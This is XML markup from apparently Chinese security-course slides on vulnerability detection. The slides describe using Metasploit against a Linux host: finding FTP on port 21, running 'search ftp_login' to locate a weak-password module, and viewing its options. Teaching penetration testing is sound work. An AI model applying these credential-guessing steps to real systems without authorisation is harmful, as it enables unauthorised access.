                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="文本框 133"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5429885" y="1740853"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>4.根据扫描结果可以看出21端口是 FTP服务的端口，下面对其进行漏洞检测。使用“search ftp_login”命令查找FTP服务的弱口令检测模块，如图2-4-45所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5429885" y="2939732"/>
            <a:ext cx="5267325" cy="1419225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="文本框 134"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5429885" y="4358957"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-45  查找FTP服务的弱口令检测模块</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="3795395" cy="854076"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="3795395" cy="854561"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3129915" cy="522267"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>使用 Metasploit工具对Linux主机进行漏洞检测</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="矩形 50"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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52" name="矩形 51"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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53" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="4389755" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.4.4 漏洞检测</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="文本框 134"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249545" y="773748"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>5.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>调用模块并使用“show options”命令查看需要配置的参数，如图</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2-4-46</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249545" y="1418908"/>
            <a:ext cx="5276850" cy="3743325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="136" name="文本框 135"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5249545" y="5162233"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-4-46 查看需要配置的参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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a:xfrm>
            <a:off x="5590261" y="1577791"/>
            <a:ext cx="5624830" cy="3331845"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="5624830" cy="3331845"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
